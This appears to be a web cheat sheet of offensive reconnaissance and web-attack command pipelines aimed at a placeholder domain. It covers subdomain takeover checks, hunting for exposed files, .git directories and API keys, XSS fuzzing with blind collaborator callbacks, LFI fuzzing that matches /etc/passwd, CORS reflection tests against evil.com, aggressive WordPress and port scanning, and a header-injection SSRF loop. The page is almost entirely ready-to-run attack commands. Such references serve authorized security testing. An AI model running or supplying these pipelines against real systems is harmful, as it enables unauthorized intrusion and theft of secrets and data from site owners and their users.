D3F4ULTZ

Security Command Center

Access and customize security testing commands for your target domain.

Subdomain Enumeration

Basic Subdomain Discovery

Discovers subdomains using subfinder with recursive enumeration and saves results to a file.

$ subfinder -d example.com -all -recursive > subexample.com.txt

Live Subdomain Filtering

Filters discovered subdomains using httpx and saves the alive ones to a file.

$ cat subexample.com.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subexample.coms_alive.txt

Subdomain Takeover Check

Checks for subdomain takeover vulnerabilities using subzy.

$ subzy run --targets subexample.com.txt --concurrency 100 --hide_fails --verify_ssl

URL Collection

Passive URL Collection

Collects URLs from various sources and saves them to a file.

$ katana -u subexample.coms_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt

Advanced URL Fetching

Combines passive and active katana crawling, keeps URLs that carry parameters, de-duplicates them, and blanks the parameter values in final.txt.

$ echo example.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | urldedupe > output.txt
$ katana -u https://example.com -d 5 | grep '=' | urldedupe | anew output.txt
$ cat output.txt | sed 's/=.*/=/' > final.txt

GAU URL Collection

Collects URLs using GAU and saves them to a file.

$ echo example.com | gau --mc 200 | urldedupe > urls.txt
$ cat urls.txt | grep -E '\.(php|asp|aspx|jspx|jsp)' | grep '=' | sort > output.txt
$ cat output.txt | sed 's/=.*/=/' > final.txt

Sensitive Data Discovery

Sensitive File Detection

Filters the collected URLs for file extensions that often hold sensitive data.

$ cat allurls.txt | grep -E '\.(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|zip|tar\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5)'

Information Disclosure Dork

Searches for information disclosure vulnerabilities using a dork.

site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

Git Repository Detection

Detects Git repositories on the web server.

$ cat example.coms.txt | grep "SUCCESS" | gf urls | httpx-toolkit -sc -server -cl -path "/.git/" -mc 200 -location -ms "Index of" -probe

Information Disclosure Scanner

Pulls known URLs with gau and keeps those ending in extensions associated with documents, backups, keys, databases and configuration files.

$ echo https://example.com | gau | grep -E '\.(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|zip|tar\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|tar|xz|7zip|p12|pem|key|crt|csr|sh|pl|py|java|class|jar|war|ear|sqlitedb|sqlite3|dbf|db3|accdb|mdb|sqlcipher|gitignore|env|ini|conf|properties|plist|cfg)$'

AWS S3 Bucket Finder

Searches for AWS S3 buckets associated with the target.

$ s3scanner scan -d example.com

API Key Finder

Searches for exposed API keys and tokens in JavaScript files.

$ cat allurls.txt | grep -E '\.js$' | httpx-toolkit -mc 200 -content-type | grep -E "application/javascript|text/javascript" | cut -d' ' -f1 | xargs -I% curl -s % | grep -E "(API_KEY|api_key|apikey|secret|token|password)"

XSS Testing

XSS Hunting Pipeline

Collects candidate XSS injection points by chaining gau, gf, uro, Gxss and kxss, and saves them to a file.

$ echo https://example.com/ | gau | gf xss | uro | Gxss | kxss | tee xss_output.txt

XSS with Dalfox

Uses Dalfox to scan for XSS vulnerabilities.

$ cat xss_params.txt | dalfox pipe --blind https://your-collaborator-url --waf-bypass --silence

Stored XSS Finder

Finds potential stored XSS vulnerabilities by scanning forms.

$ cat urls.txt | grep -E "(login|signup|register|forgot|password|reset)" | httpx -silent | nuclei -t nuclei-templates/vulnerabilities/xss/ -severity critical,high

DOM XSS Detection

Detects potential DOM-based XSS vulnerabilities.

$ cat js_files.txt | Gxss -c 100 | sort -u | dalfox pipe -o dom_xss_results.txt

LFI Testing

LFI Methodology

Tests for Local File Inclusion (LFI) vulnerabilities using various methods.

$ echo "https://example.com/" | gau | gf lfi | uro | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | xargs -I{} ffuf -u {} -w payloads/lfi.txt -c -mr 'root:(x|\*|\$[^:]*):0:0:' -v

CORS Testing

Basic CORS Check

Checks the Cross-Origin Resource Sharing (CORS) policy of a website.

$ curl -H "Origin: http://example.com" -I https://example.com/wp-json/

CORScanner

Fast CORS misconfiguration scanner that helps identify potential CORS vulnerabilities.

$ python3 CORScanner.py -u https://example.com -d -t 10

CORS Nuclei Scan

Uses Nuclei to scan for CORS misconfigurations across multiple domains.

$ cat example.coms.txt | httpx -silent | nuclei -t nuclei-templates/vulnerabilities/cors/ -o cors_results.txt

CORS Origin Reflection Test

Tests for origin reflection vulnerability in CORS configuration.

$ curl -H "Origin: https://evil.com" -I https://example.com/api/data | grep -i "access-control-allow-origin: https://evil.com"

WordPress Scanning

Aggressive WordPress Scan

Scans a WordPress website for vulnerabilities, enumerating all themes, all plugins and users with aggressive plugin detection.

$ wpscan --url https://example.com --disable-tls-checks --api-token YOUR_TOKEN -e at,ap,u --plugins-detection aggressive --force

Network Scanning

Naabu Scan

Scans for open ports and services using Naabu.

$ naabu -list ip.txt -c 50 -nmap-cli 'nmap -sV -sC' -o naabu-full.txt

Nmap Full Scan

Performs a full port scan using Nmap.

$ nmap -p- --min-rate 1000 -T4 -A example.com -oA fullscan

Masscan

Scans for open ports and services using Masscan.

$ masscan -p0-65535 example.com --rate 100000 -oG masscan-results.txt

Parameter Discovery

Arjun Passive

Passively discovers parameters using Arjun.

$ arjun -u https://example.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"

Arjun Wordlist

Uses Arjun to discover parameters using a custom wordlist.

$ arjun -u https://example.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"

JavaScript Analysis

JS File Hunting

Collects JavaScript files from a website and analyzes them.

$ echo example.com | katana -d 5 | grep -E '\.js$' | nuclei -t /path/to/nuclei-templates/http/exposures/ -c 30

JS File Analysis

Analyzes collected JavaScript files.

$ cat alljs.txt | nuclei -t /path/to/nuclei-templates/http/exposures/

Content Type Filtering

Content Type Check

Checks the content type of URLs.

$ echo example.com | gau | grep -Eo '(\/[^\/]+)\.(php|asp|aspx|jsp|jsf|cfm|pl|perl|cgi|htm|html)$' | httpx -status-code -mc 200 -content-type | grep -E 'text/html|application/xhtml\+xml'

JavaScript Content Check

Checks for JavaScript content in URLs.

$ echo example.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'

Shodan Dorks

SSL Certificate Search

Searches for SSL certificates using Shodan.

ssl.cert.subject.CN:"example.com" 200

FFUF Request File Method

LFI with Request File

Uses FFUF to bruteforce LFI vulnerabilities using a request file.

$ ffuf -request lfi -request-proto https -w /root/wordlists/offensive\ payloads/LFI\ payload.txt -c -mr "root:"

XSS with Request File

Uses FFUF to bruteforce XSS vulnerabilities using a request file.

$ ffuf -request xss -request-proto https -w /root/wordlists/xss-payloads.txt -c -mr "<script>alert('XSS')</script>"

Advanced Techniques

XSS/SSRF Header Testing

Tests for XSS and SSRF vulnerabilities using various methods.

$ cat example.coms.txt | assetfinder --subs-only | httprobe | while read -r url; do
    xss1=$(curl -s -L "$url" -H 'X-Forwarded-For: xss.yourburpcollaborator' | grep xss)
    xss2=$(curl -s -L "$url" -H 'X-Forwarded-Host: xss.yourburpcollaborator' | grep xss)
    xss3=$(curl -s -L "$url" -H 'Host: xss.yourburpcollaborator' | grep xss)
    xss4=$(curl -s -L "$url" --request-target http://burpcollaborator/ --max-time 2)
    echo -e "\e[1;32m$url\e[0m""\n""Method[1] X-Forwarded-For: xss+ssrf => $xss1""\n""Method[2] X-Forwarded-Host: xss+ssrf ==> $xss2""\n""Method[3] Host: xss+ssrf ==> $xss3""\n""Method[4] GET http://xss.yourburpcollaborator HTTP/1.1 ""\n"
  done